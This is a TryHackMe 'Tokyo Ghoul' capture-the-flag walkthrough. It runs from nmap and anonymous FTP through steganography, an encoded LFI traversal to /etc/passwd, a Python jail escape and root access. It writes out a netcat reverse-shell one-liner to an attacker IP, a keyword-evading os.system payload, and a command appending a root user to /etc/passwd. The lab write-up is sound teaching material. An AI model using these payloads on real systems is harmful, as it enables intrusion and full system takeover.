THM ROOM: Tokyo Ghoul Walkthrough

0xViKi
Published in System Weakness
Oct 25, 2023

Welcome to another exciting Try Hack Me adventure! In this write-up, we’ll be exploring the Tokyo Ghoul-themed machine to uncover its secrets and vulnerabilities. Buckle up, and let’s dive into the world of Tokyo Ghoul!

THM Challenge Link: https://tryhackme.com/room/tokyoghoul666

Reconnaissance:

Our adventure begins with an Nmap scan to find the open ports and identify the services behind them (the SYN scan needs root, hence sudo):

sudo nmap -sV -sS -A <IP>

The scan shows three services:

  • Port 21 (FTP) running vsftpd 3.0.3.
  • Port 22 (SSH) running OpenSSH 7.2p2 on Ubuntu.
  • Port 80 (HTTP) hosting an Apache web server on Ubuntu.

Information Gathering:

FTP Anon Login:

First we try the FTP service, and to our delight it allows anonymous login. Inside we find a directory named “need_Help?” holding some interesting files:

  • “Aogiri_tree.txt”, a text file
  • “Talk_with_me”, a directory containing:
    - “rize_and_kaneki.jpg”, an image
    - “need_to_talk”, an ELF file (a Linux executable)

[Screenshot: FTP directory listing]

Our curiosity piqued, we download the image and the ELF file and look for hidden secrets in both.

Linux Binary Analysis:

Running the need_to_talk binary prompts for a password. Entering a random one produces the message “Take a look inside of me rabin2 -z”, a hint to dump the binary's strings with rabin2 (part of radare2).

Either strings or rabin2 -z lists the ASCII strings embedded in the binary; the screenshot below shows the rabin2 output.

[Screenshot: string extraction with rabin2 -z]

One of those strings is the password. Running the program again and entering it prints a second string, which looks like a password for something else.

[Screenshot: string extraction with strings]

Steganographic Analysis:

Next we turn to the image rize_and_kaneki.jpg from the FTP share. Running stegseek on it asks for a passphrase, and the second string from the ELF file turns out to be it. Voila!! Extraction yields a text file named “yougotme.txt”.

“yougotme.txt” contains two phrases and a block of Morse code:

  • “haha you are so smart kaneki but can you talk my code”
  • “if you can talk it all right, you got my secret directory,”

The Morse code is decoded with CyberChef in three layers: the Morse decodes to a hex string, the hex decodes to base64, and the base64 decodes to plain text naming a directory on the web server.

[Screenshot: decoding the hint in CyberChef]
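The same Morse → hex → base64 unwrapping as a script, added here as an example and not part of the original write-up. It guesses each layer from its alphabet and peels until the result is plain text. The sample HINT is constructed for this example (it wraps the made-up directory name "hidden_dir"); the room's real Morse text is not reproduced.

```python
import base64
import binascii
import re

# International Morse code; the hint in the room used Morse as the outermost layer.
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}


def morse_decode(text: str) -> str:
    """Decode Morse where letters are separated by a space and words by ' / '
    or a newline (CyberChef's defaults). Unknown symbols raise ValueError."""
    words = []
    for word in re.split(r"\s*/\s*|\n", text.strip()):
        symbols = word.split()
        if not symbols:
            continue
        try:
            words.append("".join(MORSE[s] for s in symbols))
        except KeyError as exc:
            raise ValueError(f"unknown Morse symbol {exc}") from None
    return " ".join(words)


def peel(text: str) -> list:
    """Strip encoding layers one at a time (Morse, hex, base64), guessing each
    layer from its alphabet, and return [(layer_name, decoded_text), ...].
    Guessing by alphabet is heuristic: plaintext that happens to look like hex
    or base64 would be decoded once more, so we stop as soon as the result is
    no longer printable text."""
    layers = []
    current = text
    for _ in range(10):  # hard cap so a misdetected layer cannot loop forever
        compact = re.sub(r"\s+", "", current)
        if re.fullmatch(r"[.\-/\s]+", current):
            current = morse_decode(current)
            layers.append(("morse", current))
        elif re.fullmatch(r"[0-9A-Fa-f]+", compact) and len(compact) % 2 == 0:
            current = bytes.fromhex(compact).decode("latin-1")
            layers.append(("hex", current))
        elif re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact) and len(compact) % 4 == 0:
            try:
                current = base64.b64decode(compact, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                break
            layers.append(("base64", current))
        else:
            break
        if not current.isprintable():
            break
    return layers


def decode_hint(text: str) -> str:
    """Convenience wrapper: the innermost plaintext, or the input if nothing matched."""
    layers = peel(text)
    return layers[-1][1] if layers else text


# Constructed sample for this example (not the room's real hint): Morse of the
# hex of the base64 of the directory name "hidden_dir".
HINT = (
    "-.... .---- ....- --... -.... -.-. -.... -... ..... .- ....- --... "
    "..... -.... --... ..... ..... ---.. ...-- ..--- ..... ..--- --... ----- "
    "-.... ...-- -.... --... ...-- -.. ...-- -.."
)

if __name__ == "__main__":
    for name, value in peel(HINT):
        print(f"{name:>6}: {value}")
```

Running it prints the three intermediate values (the hex string, the base64 string, then the directory name), which is exactly what you would read off the CyberChef output pane one recipe step at a time.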

We browse to the decoded directory on the web server and find a page that just says “scan me”, a hint to run directory enumeration against it and dig out hidden content.

Web Directory Enumeration:

We launch Gobuster against the decoded directory, looking for subdirectories and PHP or text files:

gobuster dir -u http://<IP>/<DECODED_DIRECTORY> -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20

Gobuster turns up “/d1r3c70ry_center/claim”. The page there has a Local File Inclusion (LFI) vulnerability, but the straightforward traversal payload is blocked, so we need a bypass.

LFI Bypass:

Having trouble bypassing the filter, we turn to resources such as HackTricks and various articles, and eventually land on the PayloadsAllTheThings GitHub repository, which collects LFI filter-bypass techniques.

Working through those, the one that succeeds here is URL-encoding the traversal sequence:

# URL Encoded, %2F == '/'; %2E == '.'
%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd

# URL DECODED
/../../../etc/passwd

With this bypass the vulnerable page reads files from the server's filesystem, such as /etc/passwd, which opens the door to further exploration.
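To make the bypass concrete, here is an added example (not from the write-up, and not the room's PHP, whose filter code is unknown) that models two weak LFI checks beside the one that actually holds. The web root, the filter implementations and the payload variants other than the write-up's own are constructed for this example.

```python
import os
import tempfile
from typing import Optional
from urllib.parse import unquote


def naive_target(root: str, page: str) -> str:
    """Where a vulnerable include(root . '/' . $page) would end up once the
    path is normalised. Constructed model of the include, not the room's code."""
    return os.path.normpath(root + "/" + page)


def filter_raw_query(root: str, raw_page: str) -> Optional[str]:
    """Weak check #1: looks for '../' in the raw, still URL-encoded parameter and
    only decodes afterwards. '%2E%2E%2F' contains no '../', so it passes."""
    if "../" in raw_page:
        return None
    return naive_target(root, unquote(raw_page))


def filter_strip_once(root: str, raw_page: str) -> Optional[str]:
    """Weak check #2: decodes first but removes '../' only once (non-recursively),
    so '....//' collapses back into '../' after the filter has run."""
    cleaned = unquote(raw_page).replace("../", "")
    return naive_target(root, cleaned)


def safe_include(root: str, raw_page: str) -> Optional[str]:
    """The check that holds: decode once, canonicalise the result (symlinks
    included) and require it to stay inside the web root. Returns the path to
    open, or None if it escaped."""
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, unquote(raw_page).lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def demo_root() -> str:
    """A throwaway directory standing in for /var/www/html (constructed)."""
    return os.path.realpath(tempfile.mkdtemp())


# The write-up's payload plus the classic variants, as constructed inputs.
ENCODED = "%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd"   # from the write-up
PLAIN = "../../../etc/passwd"
NESTED = "....//....//....//etc/passwd"
DOUBLE = "%252E%252E%252Fetc%252Fpasswd"                 # decodes once to a literal '%2E%2E%2F...'

if __name__ == "__main__":
    root = demo_root()
    for name, payload in [("plain", PLAIN), ("encoded", ENCODED), ("nested", NESTED), ("double", DOUBLE)]:
        print(f"{name:8} raw-filter={filter_raw_query(root, payload)!s:40} "
              f"strip-once={filter_strip_once(root, payload)!s:40} safe={safe_include(root, payload)}")
```

Two things worth noticing in the output: the safe check lets NESTED and DOUBLE through because, decoded exactly once, they are just odd file names inside the web root (no traversal happens), whereas it refuses every payload that resolves outside the root regardless of how it was encoded. Blacklisting substrings can never reach that property; canonicalising and comparing against the root can.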

User Enumeration:

With this read access we enumerate the system's users (/etc/passwd lists them) and find a user named “kamishiro”. That gives us a target account; next we need its password.

Cracking the password:

We crack the password for user “kamishiro” with John the Ripper. After some time the very complicated and safe password is exposed: “xxx”

[Screenshot: John the Ripper cracking the password]

We now have SSH access using the following credentials:

  • Username: kamishiro
  • Password: xxx

Initial Foothold:

Logging in over SSH, I land in a restricted environment. There isn't much to investigate, so our only lead is the jail.py script.

Privilege Escalation:

I recall an article about Python jail escapes and sandbox exploitation and start trying different commands and statements to see what the jail lets through. (Article about python jailbreak)

Exploiting python jail:

After some trial and error I found the trick: whatever is wrapped in a print() call gets evaluated. So the sandbox escape has to be placed inside a print statement.

# List the builtin functions that are still reachable
print(dir(__builtins__))

# Fetch a builtin through the __builtins__ dictionary instead of by name
print(__builtins__.__dict__['id'])

# Call a builtin fetched that way, with different arguments
print(__builtins__.__dict__['type']('as'))
print(__builtins__.__dict__['type'](123))

[Screenshot: Python jail PoC]

Since __builtins__.__dict__ also holds __import__, this gives us a way to reach os.system from inside the jail and execute Linux commands despite its restrictions.
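The escape as a self-contained demonstration, added here as an example and not part of the write-up. The jail below is constructed to behave the way the post describes (only a print(...) call is accepted and a keyword blacklist is applied); jail.py from the room is not reproduced, and the blacklist words are an assumption. The payload uses the same upper-case-plus-.lower() trick as the reverse-shell command further down, but calls os.getpid() so it can be checked instead of spawning a shell.

```python
import builtins
import contextlib
import io
import os

# Assumed blacklist; the real jail's list is not known.
BLACKLIST = ("import", "os", "system", "eval", "exec", "open", "subprocess")


def jail_run(user_input: str) -> str:
    """Mimic the jail: accept only a print(...) call, refuse blacklisted words,
    then evaluate the call and return what it printed."""
    code = user_input.strip()
    if not (code.startswith("print(") and code.endswith(")")):
        return "blocked: only print() is allowed"
    if any(word in code for word in BLACKLIST):
        return "blocked: forbidden keyword"
    # The room's jail evaluated input in its module namespace, where __builtins__
    # is the builtins *module*. Passing the module explicitly preserves that, so
    # __builtins__.__dict__ resolves the way it did on the target (with a fresh
    # globals dict, exec would insert the builtins *dict* instead and
    # .__dict__ would fail).
    buf = io.StringIO()
    with contextlib.redirect_stdout(buf):
        exec(code, {"__builtins__": builtins})
    return buf.getvalue()


# Naive attempt: the literal word "import" trips the blacklist.
DIRECT = "print(__import__('os').system('id'))"

# Escape: spell the forbidden names in upper case and lower() them at runtime,
# so the blacklisted substrings never appear in the submitted text.
ESCAPE = (
    "print(__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower())"
    ".__dict__['GETPID'.lower()]())"
)


def demo():
    """Return (result of the direct attempt, whether the escape reached the real os module)."""
    direct = jail_run(DIRECT)
    escaped = jail_run(ESCAPE).strip() == str(os.getpid())
    return direct, escaped


if __name__ == "__main__":
    print(demo())
```

Swap 'GETPID' for 'SYSTEM' and pass a command string, and you have the reverse-shell and /etc/passwd one-liners used below; the filter never sees the words it is looking for because they only exist after .lower() runs.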

Privilege Escalation Methods

We proceed to escalate our privileges and explore two potential methods:

Method 1: Reverse Shell

  1. Start a listener on your local machine: nc -nlvp 5555
  2. Run the following inside the jail on the target (the upper-case strings with .lower() spell out __import__, os and system without those words appearing literally in the input, presumably what keeps the jail's keyword check from catching them):
print(__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <YOUR_TUN0_IP> 5555 >/tmp/f'))

Method 2: Editing /etc/passwd

  1. Generate a password hash: openssl passwd toor (this prints an MD5-crypt hash such as '$1$DJ/ZKXco$/AuX1Be7riGLdOABRPULx.'; yours will differ because the salt is random)
  2. Build the /etc/passwd entry and base64-encode it. Use single quotes: inside double quotes the shell would expand the $-prefixed parts of the hash as variables and silently mangle the line.
echo 'toor:$1$DJ/ZKXco$/AuX1Be7riGLdOABRPULx.:0:0:root:/root:/bin/bash' | base64

# Output
# dG9vcjokMSRESi9aS1hjbyQvQXVYMUJlN3JpR0xkT0FCUlBVTHguOjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=

  3. Run the following inside the jail on the target; it appends the entry (uid 0) to /etc/passwd, after which su toor with the password toor gives a root shell:

print(__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('echo "dG9vcjokMSRESi9aS1hjbyQvQXVYMUJlN3JpR0xkT0FCUlBVTHguOjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=" | base64 -d >> /etc/passwd'))

For greater clarity, below is a brief video for each of the procedures stated above.

Retrieving Flags:

With root access secured, we were able to retrieve both the user and root flags.

  • The user flag was located in the “/home/kamishiro/user.txt” file.
  • The root flag was stored in the “/root/root.txt” file.

Voila!!! Congratulations on clearing the Tokyo Ghoul room. Thanks to the creators (devalfo and rockyou.txt) for providing this fantastic room.
